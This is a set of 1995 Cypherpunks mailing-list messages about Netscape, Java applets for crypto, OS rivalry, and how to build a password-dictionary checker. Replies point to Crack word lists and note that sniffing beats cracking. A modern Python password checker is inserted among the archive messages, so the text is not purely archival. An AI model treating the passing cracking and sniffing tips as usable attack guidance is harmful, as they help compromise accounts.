stable attractor, deployed on many platforms. (I'm assuming the debate
here about Netscape standards does not imply much of a fragmentation,
that Mosaic, Netscape, MacWeb, etc., will all basically be able to
display Web pages in much the same way.)"

Enough people are starting to "surf the Web" (whatever you think of that
expression) that this is becoming the _de facto_ next attractor, or island.
_Millions_ of users will have whatever tools and "helper apps" in their
versions of Mosaic, Netscape, MacWeb, etc. such that this will be the
platform/environment of choice. As the browsers add e-mail (receiving, as
most or all can send mail), and as applets/helpers proliferate, then these
platforms/environments will allow new forms of e-mail to finally become
_widespread_ (note that I did not say "possible," but instead said
"widespread").

Many folks I have expressed this view to have said "But the Web is not a
two-way medium like e-mail." That is, most people spend most of their time
on the Web "reading" (viewing) the stuff others have put on the Web.

Three points:

1. This is changing already, as "feedback" is included on pages. This
feedback is beginning to look like local newsgroups, and will become more
so (IMO).

(Speculation: The current Usenet "feed" is of course huge. It may get
replaced, via evolution/revolution, by a shift to a Web-oriented system of
local newsgroups. What I mean by this is that instead of reading, say,
"alt.cypherpunks," one points one's browser at
"http://www.cypherpunks.org/" and uses one's various Web tools to browse,
sort, search, read, and respond to comments of others. BTW, this could be
done today, and might be a better alternative than creating
"alt.cypherpunks." The current approach of shipping the entire Usenet feed
to all the sites that carry it is likely to eventually break down.)

(Even more speculation: Currently I point my Netscape at which news server
I wish, from a choice of several. The idea of "subscription-based" News
sites is an interesting one. I might pay extra money for a site that is
very current and carries all News groups, while parents might pick a site
that is sufficiently sanitized for them, a site they let their children
access. Much more to say here, but I see several Cypherpunks themes.)

2. The easy-to-use integration of helper apps into Web browsers will confer
the same capabilities on mailers that are now associated with these Web
browsers. (Again, don't tell me what _your_ mailer can now do, look to what
the millions of people are using...they'll gain a lot when their mailers,
whether part of Netscape or MacWeb or not, can automatically handle things
their browsers can now handle.)

3. The main development seems to me to be in Web tools these days. Being a
user of "tin" for several years, and seeing minimal development of it the
past two years, I've seen tin get almost no new features. Ditto for "elm,"
my mailer (when logged-on to Unix systems). (Before you comment, I can't
speak for trn, nn, rn, etc., or mailers such as pine. But friends of mine
have told me the same stagnation is happening with other mailers and
newsreaders. Many of the developers of tin, elm, archie, gopher, etc., have
moved on to bigger and better things.)

So, given that it has long been recognized as a valid Cypherpunks goal to
see what people are using for mail and newsreading, I think an analysis of
what's likely to be popular amongst the "masses" is valid. (I don't disdain
the "masses," at least not in this context. The needs of a lawyer wanting
to communicate securely with his client are not the needs of a C hacker
wanting to configure his Linux box to auto-sign his emacs messages.)

My views on the Web have *not* changed dramatically since last fall and
winter when I was talking in these terms, though all I had then was a
text-oriented browser (lynx), and it was not very exciting (as Ray Cromwell
also notes).

(And I recall this discussion on the importance of the Web going on several
times earlier, including a prediction/hope by the Extropians list
organizers, including Harry Shapiro (Hawk) that the Web could be the
solution for distributing graphics-content mailing lists...this was around
1993 sometime.)

I'm definitely not "dissing" Unix, though I personally never had much use
for it. The world is made up of all kinds of people. Some are hackers, some
are expert cryptographers, some are lawyers, and so on. The needs of a
lawyer for computer tools and writing aids are quite a bit different from
those of someone who wants to put together a Linux box for C hacking.

If I sound snide in my comments about Linux, I don't mean to be. What I
mean is that very, very few users, even fairly sophisticated users, are
going to be doing their work on Linux boxes. (If I'm wrong about this, and
Linux becomes a serious deployment system--as opposed to a Sun-killer,
which is what it looks like now--then I'll acknowledge that I was wrong.)

As cheap boxes to deploy remailers and Web sites on, Linux sounds like a
win. I'm unconvinced that it has a future for _general_ users, though. (And
by general users I don't mean computer-phobic newbies, I mean the folks
buying Windows in the tens of millions and Macs in the millions per year.
Wider use of crypto means these users, not just the current PGP users.)

Nothing has changed my view that the Web is clearly the next big attractor,
the next big island. Integrating crypto into it is likely the next big win,
which is how this latest thread started. (And by "integrating crypto into
it" I don't necessarily mean getting the source code from Netscape or Spry
or whomever and adding it...the integration can be done in multiple ways, I
think, and as several folks here are already thinking about.)

In any case, the future will unfold as it unfolds. Maybe I'm right, maybe
not. Maybe only partially right.

Debate is healthy, and at least this debate is closer to being on-topic
than discussions of red mercury (and the even rarer columbium-niobium alloys
the Japanese have developed) and Cypherpunks logos.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 21 Jul 95 08:45:24 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Netscape the Big Win
In-Reply-To: <199507210121.VAA29893@bb.hks.net>
Message-ID: <199507211545.LAA18993@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> >   The answer is: integration. While TRN is a great newsreader, and 
> >Eudora's a great mail reader, etc, if I read a post in TRN or a message
> >in Eudora, there is no hyperlinking. If I see a link or reference,
> 
> If you used a Mac, all you had to do is click on the URL in your mailer,
> newsreader, even some text editors, and the correct helper application will
> open the URL.

  Yeah, but does it fire up 1 browser process every time you click on it, or
will it command an already running browser to follow the link? Secondly,
this still doesn't solve the problem of interactive content and custom
interfaces. With Java, you can build arbitrarily complex web interfaces
with objects that can be linked together. An example of this is Sun's
Spreadsheet Java App which is connected to a StockQuote app which runs
a cute ticker tape scroller in the page. If you fill out the spreadsheet
with stock symbols and amounts, it automagically updates your net-worth
in real time, and simultaneously updates a line graph of your net worth
in a window below. I can imagine a newsreader app which automagically
pulls ratings down from a server and communicates with other apps in the
same page.

(plus, Tetris, Reversi, and Video Poker running within a web page with
text and links wrapped around them is really cool!)

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Owen Lynn <lynnowe@netcom.com>
Date: Fri, 21 Jul 95 11:47:56 PDT
To: cypherpunks@toad.com
Subject: Phrack SummerCon - I enjoyed your talk
Message-ID: <Pine.3.89.9507211150.A812-0100000@netcom3>
MIME-Version: 1.0
Content-Type: text/plain


Eric,

I was there in 'lanta when you gave your talk at SummerCon, and I
thoroughly enjoyed it. I was especially intrigued by some of the, um,
fun you can have with corporations. Are there any books I can read
that are sort of _Fun with Your Corporation for Beginners_?

fnord






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Fri, 21 Jul 95 08:47:39 PDT
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: And another thing...
In-Reply-To: <m0sZJsw-0009tNC@sdwsys>
Message-ID: <199507211546.LAA27197@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain



> (I'm talking about Magic Cap (the OS) development in which I think the
> language was called Telescript.)

I spent a lot of time talking to them..

While there was some telescript embedded in Magic Cap, Telescript was
(and I think still is) a separate Networking/Server product.

/hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Fri, 21 Jul 95 12:18:19 PDT
To: scifri@npr.org
Subject: Today's Internet discussion on Science Friday
Message-ID: <199507211916.MAA18932@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi!  I just saw that you'd be discussing the Exon Censorship Bill
discussion on today's Science Friday on Talk of The Nation; I found out
from a mailing list on the Internet, and had time to tune in,
but not enough advance warning to attack-dial and become the one lucky
caller who actually got on :-)

You picked a well-balanced set of interviewees; I was a bit disappointed
by the time balance between discussion and callers.  It would also be
nice if you extended the on-line discussion to the Internet as well as
the commercial services AOL and Compuserve, since that extends the collection
of people who can be involved in the discussion.

[Summary for list-folk - the speakers were Bruce Taylor of National Law Center
for Children and Families (sounds like a Pat Robertson thing), Dan Weitzner
of CDT, and Larry Maggoth(sp?) who wrote the Child Safety on the Info
Superhighway pamphlet.
Larry led off, Taylor dominated the discussions, Weitzner mostly wimped out.
Everybody agreed that there's obscenity on the Internet if you want to find it,
and that it's great that we have obscenity laws to punish Bad People and
Protect Kids; Rimm's bogus numbers weren't discussed, the
indecency-vs-obscenity was starting to be discussed but got cut off by time.]
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Fri, 21 Jul 95 12:32:40 PDT
To: gorkab@sanchez.com (It's supposed to crash like that.)
Subject: Re: big word listing
Message-ID: <199507211931.MAA21230@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>| As a security measure, I am trying to get a massive dictionary of words
>| together, and each time a user changes his/her password, it checks the list to
>| see if the password is in it.  My question is, are there any pre-built lists of
>| this nature?  I am currently only using a spelling dictionary, and would like
>| something a little bigger.
>
>	Look on coast.cs.purdue.edu in the password/Crack areas.

There are also Grady Ward's Moby Words and related moby-listings, though
things like Crack will probably do a more thorough job of variants like
word, drow, w0rd, word0, drow0, word1, 0word, 1word, word1word, etc.
which people use to complicate their passwords.

Caveat: If you're building it on Unix, _don't_ set up the command to
take the proposed password on the command line, e.g. "checkpass foobar2",
since that makes it visible to anyone who runs ps.  Feed it through stdin,
or set it as a variable and fork, or something like that.
And remember that binary searches are _far_ faster than reading whole
dictionaries, and hashes are even faster if you're willing to preprocess more.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
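
One way to implement the check described in this message, as an added example in Python (not code from the post or from Crack): the candidate arrives on stdin rather than argv, is reduced to the base forms behind variants such as drow0 and word1word, and is looked up by hash or by binary search. The word list, the look-alike table and all function names are assumptions made for the example.

```python
import bisect
import re
import sys

# Constructed sample list; a real deployment loads a large word list such as
# the Crack dictionaries or Moby Words mentioned in the thread.
SAMPLE_WORDS = ["dragon", "foobar", "password", "secret", "word"]

# Assumed look-alike table: digits and symbols folded back to letters.
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a",
                      "5": "s", "7": "t", "$": "s", "@": "a", "!": "i"})


def base_forms(password):
    """Return the plain words a password could have been derived from."""
    p = password.lower()
    forms = {p, re.sub(r"^[^a-z]+|[^a-z]+$", "", p)}      # word0, 0word
    forms |= {f.translate(LEET) for f in forms}            # w0rd
    forms |= {re.sub(r"[^a-z]", "", f) for f in forms}     # word1word -> wordword
    forms |= {f[:len(f) // 2] for f in forms               # wordword -> word
              if len(f) % 2 == 0 and f[:len(f) // 2] == f[len(f) // 2:]}
    forms |= {f[::-1] for f in forms}                      # drow
    forms.discard("")
    return forms


def in_sorted(sorted_words, word):
    """Binary search: O(log n) probes of a sorted list, no full scan."""
    i = bisect.bisect_left(sorted_words, word)
    return i < len(sorted_words) and sorted_words[i] == word


def check_password(password, contains):
    """Return the dictionary word the password derives from, or None.

    `contains` is any membership test: a hash set's __contains__ or a
    binary search over a sorted list.
    """
    hits = sorted(f for f in base_forms(password) if contains(f))
    return hits[0] if hits else None


def read_candidate(stream):
    """Read the proposed password as one line from a stream (stdin)."""
    return stream.readline().rstrip("\r\n")


def main(argv, stdin):
    if len(argv) > 1:
        # Arguments are visible to anyone who runs ps; refuse them outright.
        print("usage: checkpass < password   (never as an argument)",
              file=sys.stderr)
        return 2
    index = frozenset(SAMPLE_WORDS)  # hash lookup, built once
    if check_password(read_candidate(stdin), index.__contains__):
        # The password itself is never echoed back.
        print("rejected: derived from a dictionary word", file=sys.stderr)
        return 1
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv, sys.stdin))
```

The variant rules here are a small subset of what a full rule set covers; each extra rule is one more line in `base_forms`.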





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wb8foz@nrk.com (David Lesher)
Date: Fri, 21 Jul 95 08:41:42 PDT
To: hal9001@panix.com (Robert A. Rosenberg)
Subject: Re: It had to happen...
In-Reply-To: <v02130500ac34ed849b30@[165.254.158.4]>
Message-ID: <m0sZLCu-0005BTC@nrk.com>
MIME-Version: 1.0
Content-Type: text



> >Has anyone caught this yet? From "No Such Agency" to having
> >their own Web page... wow.
> >
> >http://www.nsa.gov:8080/

> They've been on the net for years. They were dockmaster (I do not remember
> the domain) and were mentioned as such in Cuckoo's Egg. The address is
> probably being run by the same section as dockmaster is/was (RTM Sr's
> Group).


Note that last I heard RM Sr. had retired & moved to New England.
He is an interesting ....character... for lack of a better word.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jason Burrell" <jburrell@crl.com>
Date: Fri, 21 Jul 95 08:41:25 PDT
To: cypherpunks@toad.com
Subject: House Waco Hearings
Message-ID: <199507211541.KAA00499@crl.com>
MIME-Version: 1.0
Content-Type: application/x-pgp-message

application/pgp-message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 21 Jul 95 12:58:26 PDT
To: cypherpunks@toad.com
Subject: Re: big word listing
In-Reply-To: <00993AF518E527C0.00011F64@sanchez.com>
Message-ID: <199507211958.MAA19853@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "It's supposed to crash like that." <gorkab@sanchez.com> writes:
> As a security measure, I am trying to get a massive dictionary of words
> together, and each time a user changes his/her password, it checks the list to
> see if the password is in it.  My question is, are there any pre-built lists of
> this nature?  I am currently only using a spelling dictionary, and would like
> something a little bigger.

Yes, there are -- see ftp.ox.ac.uk for a lovely set of them.  This is a
reasonable approach, but it's insufficient: you also need to check lots of
variants on the words.  I'd suggest looking at the code in Programming
Perl (Larry Wall and Randal L. Schwartz) for checking potential
passwords, and I'd suggest looking at the initial ruleset used by Crack,
the Unix password cracking tool; the same rules should be good for any
kind of password scheme.

Also you should be aware that cracking passwords is passe' these days:
it's much easier to run an ethernet sniffer and gather them wholesale.
Every little bit helps, though.

	Jim Gillogly
	Sterday, 28 Afterlithe S.R. 1995, 19:54




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ben@reston.opnsys.com
Date: Fri, 21 Jul 95 10:09:44 PDT
To: cypherpunks@toad.com
Subject: Louie Freeh
Message-ID: <Pine.A32.3.91.950721125034.18393A-100000@reston.opnsys.com>
MIME-Version: 1.0
Content-Type: text/plain




    I was just listening to the G. Gordon Liddy Show, he was talking to a 
reporter for the American Spectator, which has a piece on our favorite 
FBI director Freeh. From the sound of the reporter the story is very 
damning, on everything from Waco to the entrapment of Malcolm X's
daughter.


						Ben Hill
						From the land of the Freeh






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 21 Jul 95 10:04:26 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Java (was Netscape: the big win)
In-Reply-To: <199507202345.QAA16459@jobe.shell.portal.com>
Message-ID: <199507211704.NAA12861@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> So, what would be a "cypherpunk" thing you could do with Java?  I know
> I can use it to download little applets to my system to do animations.
> What can it do to enhance my privacy?  What would be the Java equivalent
> of PGP?


* Protocol Handler
  implement a remailer:  URI that automagically communicates with remailers
  implement a pgp: URI that can decode pgp signed/encrypted text 
     automagically. Use this to implement a server where users can post
     encrypted messages for other users, and the user, upon clicking the
     link, say pgp://rays_message_to_hal.html, gets the message automatically
     decoded. The encrypted text could even be HTML!
  implement an anonymous mailto: URI that works like mailto:, but uses
    an anonymous return block or blindserver automatically

* Content Handlers
  implement a handler to decode PEM/RIPEM or any other kind of crypto 
     MIME type
  implement a handler to check signatures, that way users could use
   a multipart message, the first part being a text/html or text/plain,
   the second part being a signature. The handler would automatically
    check the signature and notify the user that the content he is 
    reading is authenticated (by beep, or icon, or title bar, whatever)

* Applications
  Implement an Elm-like mailer app, complete with editor, that can send
    rfc822 normal mail, or, optionally, send thru any remailer chain
    at the click of a radio button
  Implement an object which can open a socket to key server or list
    of remailers server, get the list, display properties, etc

The possibilities are endless. All of these things can be done in emacs, but
unlike emacs, Java will be embedded into Netscape meaning the installed base
of users will be much larger.

-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Trost <trost@cloud.rain.com>
Date: Fri, 21 Jul 95 13:44:50 PDT
To: cypherpunks@toad.com
Subject: Re: The OS wars and DOOM...
In-Reply-To: <199507211218.AA20295@tyrell.net>
Message-ID: <m0sZOPM-00004PC@cloud.rain.com>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering writes:
    Given that games usually program close to the hardware, and are 
    therefore the _most_ difficult things to port from one environment
    to another, it really makes one wonder why Excel isn't out for
    (for example) Linux or BSD today.

Microsoft has lots to lose from making software available to systems
that "compete" with MS-DOG and Windoze.  It's clearly in their best
interests to not make their software run under Unix and/or X11
(although WABI has some interesting implications in that regard).

On the other hand, that would seem to imply that it's in a lot of
other people's interest to port their software -- every little bit of
leverage against Microsoft helps.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "It's supposed to crash like that." <gorkab@sanchez.com>
Date: Fri, 21 Jul 95 10:30:34 PDT
To: cypherpunks@toad.com
Subject: big word listing
Message-ID: <00993AF518E527C0.00011F64@sanchez.com>
MIME-Version: 1.0
Content-Type: text/plain


As a security measure, I am trying to get a massive dictionary of words
together, and each time a user changes his/her password, it checks the list to
see if the password is in it.  My question is, are there any pre-built lists of
this nature?  I am currently only using a spelling dictionary, and would like
something a little bigger.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Champeon - Imonics Development <schampeo@imonics.com>
Date: Fri, 21 Jul 95 10:34:03 PDT
To: rjc@clark.net
Subject: Re: Netscape the Big Win
Message-ID: <9507211733.AA17337@fugazi.imonics.com>
MIME-Version: 1.0
Content-Type: text/plain


|   From owner-cypherpunks@toad.com Fri Jul 21 13:24:22 1995
|   From: Ray Cromwell <rjc@clark.net>
|   Subject: Re: Netscape the Big Win
|
|   > If you used a Mac, all you had to do is click on the URL in your mailer,
|   > newsreader, even some text editors, and the correct helper application will
|   > open the URL.
|   
|     Yeah, but does it fire up 1 browser process every time you click on it, or
|   will it command an already running browser to follow the link? 

You can't have multiple processes running on a Mac. (Unless the application
has a different name -- for example, you *can* have two different copies of
the Netscape application, named "NS1" and "NS2", set as the default "helpers" 
for a) news and b) HTTP, should you want to do that...)

What ICeTEe does is send an Open AppleEvent to the browser application.
If it is running, it responds by opening the URL in the browser. If the browser
isn't running, it starts the browser and then opens the URL. The INIT
(extension) patches the System "TextEdit" routines, which are used in most
apps with limited need for text processing. The name of the INIT comes from
its authors, who wrote "InternetConfig", and because it patches "TextEdit".

This isn't to say that Java isn't cool :-)

Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 21 Jul 95 10:41:27 PDT
To: gorkab@sanchez.com (It's supposed to crash like that.)
Subject: Re: big word listing
In-Reply-To: <00993AF518E527C0.00011F64@sanchez.com>
Message-ID: <199507211738.NAA01082@spl.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| As a security measure, I am trying to get a massive dictionary of words
| together, and each time a user changes his/her password, it checks the list to
| see if the password is in it.  My question is, are there any pre-built lists of
| this nature?  I am currently only using a spelling dictionary, and would like
| something a little bigger.

	Look on coast.cs.purdue.edu in the password/Crack areas.

Adam


-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Fri, 21 Jul 95 14:23:09 PDT
To: hfinney@shell.portal.com>
Subject: Re:  Java (was Netscape: the big win)
Message-ID: <ac3568170402100454ef@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Personally, I think the whole recent debate here about Java, Netscape, TCL,
Safe-TCL, Telescript, Linux, etc., has been very useful and stimulating.
The detailed exposition of ideas by Ray Cromwell, Doug Barnes, Hal Finney,
and several others is exactly what this list is all about.

At 7:24 PM 7/21/95, Douglas Barnes wrote:

>Note that I'm championing the use of Java as a portable language,
>with a portable windowing toolkit, that will (real soon now) have
>commercial tool support from a variety of vendors, as well as free
>tools available on the net (the best of both worlds.)
>
>The whole issue of how to do cryptography with applets is kind of
>complicated, and is something Amanda and I have been working on very
>diligently. The hard part is determining what the interface is
>between trusted code (that you have installed on your machine, or
>ultimately, that you've specifically designated as being trusted
>based on secure hash) and untrusted code that comes from random
>web sites on the net.

Ray's list of the many applet-based applications (so to speak), this stuff
Doug is working on, and Hal's ideas, all could lead to a next-generation of
Web-oriented user tools.

I have no idea, of course, which of the various languages and tools will
succeed. But it's good to see so much interest the past year or two in new
languages...it was looking for a while like C++ would be the only game in
town.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 21 Jul 95 11:31:42 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win(dows)
Message-ID: <199507211829.OAA08315@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ac35228910021004fd83@[205.199.118.202]>, tcmay@sensemedia.net
(Timothy C. May) wrote:

>Out of curiosity, the phrase "grown out of Netscape," aside from the
>implied barb, means what? Just what am I missing and what do I need to
>"grow out of"?

Tim,
I won't presume to speak for Robert, but I can tell you this:

Netscape/Mosaic is an awesome program. It fundamentally changed the way I
use and access the net. 

Going from terminal emulation to the present version of Netscape, as you
have,  can not fail to impress an individual. This is similar to the awe
one might feel when going from a typewriter to a computer with MS Works
preinstalled. But we both know that MS Works is often not the best tool for
the job. Its spreadsheet pales compared to Excel, its wordprocessor lacks
features, etc. Consequently, many people that buy a computer packaged with
Works end up replacing or augmenting Works with other, specialized,
programs that do a better job at many of the tasks that Works claims to
do.

Netscape is, in many regards, just like Works. It has a sub-standard
newsreader, a featureless mailer -- but a very nice browser. So many
people use Netscape for a browser and other programs for other tasks,
because other programs are better suited for it than Netscape.

When Robert mentioned that he was wondering how you would think about
Netscape in six months, he was perhaps thinking what most experienced Mac
using netsurfers know:

The various leading Mac Internet programs are excellent modular tools
that, thanks to cooperation between the various authors, are tightly
integrated. Often, the same key combinations that work in one program,
work in the other. They are small, they are fast, and they can call each
other. The only odd man out is Netscape, which tries to do it all by
itself and therefore does nothing right.

Once someone tries Anarchie for ftp, or one of the enhanced (current
leader seems to be Y.A.) Newswatchers for USENET, there is no going back
to just Netscape. 

I remember writing here once that after someone tries surfing the Web with
Mosaic, there is no going back to just using lynx. The same holds true for
Anarchie, Newswatcher, Eudora -- and Netscape.

Let's talk in six months (no barb, just confidence that you will learn new
things as time goes by),

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMA/x6SoZzwIn1bdtAQGXNgGAm2v5m3S8rJ4UWOpWSR+JD6KU1zscjsEm
xU89gO9nuJzUXk5JbOM0EhAWc9bi/kER
=Nwn1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Fri, 21 Jul 95 12:54:02 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: The OS wars and DOOM...
In-Reply-To: <199507211218.AA20295@tyrell.net>
Message-ID: <Pine.SUN.3.91.950721140842.196B-100000-100000@bambam>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Phil Fraering wrote:

> 
> This is a point I want to bring up regarding the current
> OS war being waged on this group.
> 
> Apps have migrated from Unix to the Mac and the PC before in
> the past. In the further past, this has included curses and
> other-types-of-text-control packages such as PC versions of
> Emacs and nethack and the like.
> 
> Of course, this was not done with graphical programs; everyone knows
> that graphics isn't Unix's strong suit, and what it has is so different
> from the PC, etc., blah, blah,...
> 
> Except that for the past two or three years, it's been WRONG.
> 
> One of the hottest games on the PC, DOOM, was originally written in
> Nextstep (a Unix variant, and a ghetto even amidst the "ghetto" of
> Unix) and then ported to the PC.

Very good example ... I think you will find that many programs are 
physically coded on a unix box and cross-compiled using something
like gcc or g++. One of the last steps is to add the gui interface if
required, compile on the native target platform using the compiler of
choice for that target. 

I have a friend who is coding an OS/2 project and using AIX as the 
development platform. The project started by downloading some source
code for a unix platform that essentially performed the desired task
studying it and modeling their code  after the source code off the net.
Why reinvent the wheel ?

> I don't know which Unix environment they're using in the "master"
> development effort before porting to other environments today.
> 
> Given that games usually program close to the hardware, and are 
> therefore the _most_ difficult things to port from one environment
> to another, it really makes one wonder why Excel isn't out for
> (for example) Linux or BSD today.

Very true of games and that is one of the reasons DOS is a popular
platform for games ... direct hardware control is possible and the
hardware architecture is only INTEL x86 ... although the technology 
is evolving beyond this point rapidly. Another reason for the large 
game market with DOS machines is simply the huge home market where 
DOS is the undisputed leader. 


-Mike

**************************************************************************
*       Mike Bailey                     (hm)214-252-3915                 * 
*       AT&T Capital Corporation.       (wk)214-456-4510                 *
*       email bailey@computek.net       host bambam.computek.net         *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*                http://www.computek.net/public/bailey                   *
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Fri, 21 Jul 95 13:02:32 PDT
To: gorkab@sanchez.com
Subject: Re: big word listing
In-Reply-To: <00993AF518E527C0.00011F64@sanchez.com>
Message-ID: <doug-9506212002.AA001121984@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>As a security measure, I am trying to get a massive dictionary of words
>together, and each time a user changes his/her password, it checks the list to
>see if the password is in it.  My question is, are there any pre-built lists of
>this nature?  I am currently only using a spelling dictionary, and would like
>something a little bigger.
>
>
>
You're re-inventing the wheel. Look for npasswd or passwd+. Both do things
like that. Or, better yet, don't use dictionaries at all (they're out of date
as soon as they're made available). Use rules that force your users to
choose good passwords (just don't be too Draconian. ;).  We have a rule
that says a user must choose at least one upper case character, one lower
case character, and one number, symbol, or control character in his/her
password. It's met little resistance, a few complaints, and it's immune
to most dictionary password schemes. The only other restriction is that
they must have at least 6 characters in their passwords. That was already
"mostly" enforced, so there was no problem there. 
 This prevents people from picking passwords like the name of a significant
other, the name of a place, or some foreign language word that normal
dictionaries wouldn't necessarily catch, but some password cracking program
"might" (depending on who has the more recent dictionary).

 This really is more along the charter of comp.unix.security though, and
not cypherpunks (IMHO).

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		"Real programmers use cat > file.as"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 21 Jul 95 12:06:48 PDT
To: cypherpunks@toad.com
Subject: New Form of DOS Attack
Message-ID: <199507211902.PAA28170@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Apropos of nothing...

Suppose that you are in charge of a separatist compound/Blacknet POP/Meth Lab and you are worried that The FBI/BATF/DEA/FEMA/UN jackbooted thugs with their black helicopters are planning a little "dynamic entry."

If you want to deny the Feds the opportunity for some energetic service of process, all you have to do is hire Rodney King to move in.  Once he is onsite, the Feds will be helpless.  Just keep your Greenpeace Special (tm) sat cams focussed on old Rodney and you have absolute immunity from all incursion.

Too bad we can't clone him.

DCF

"Goodby cruel world, I'm off to join the circus.  Hey, Mr. Barnum save a place for me."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 21 Jul 95 15:24:34 PDT
To: cypherpunks@toad.com
Subject: science foundation interested in anonymity
Message-ID: <199507212210.PAA15177@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


A mindblowing opportunity to promote the cypherpunk
ideal of anonymity in a highly reputable and influential
context recently dropped into the lap of a friend of
mine.

This close friend of mine got an inquiry from an extremely
prestigious science foundation into the possibility
of studying anonymity in cyberspace. It is an entirely
embryonic stage right now, but a director at this 
association is interested in commissioning papers,
interviewing subjects, having focus groups, perhaps even
organizing a conference on the subject, particularly the 
"social, legal, and technical" angles. This may have major
impact in the various and sundry studies influencing
future policy on the "information highway".

If you can forward me some leads, I would appreciate it
greatly, and I will get you in touch with this key person.

At this point the contact is at an idea stage and probably
would benefit greatly from talking to organizers of similar endeavors.
Also this project would involve fundraising for the cost
of the studies, so anyone you might know with an interest
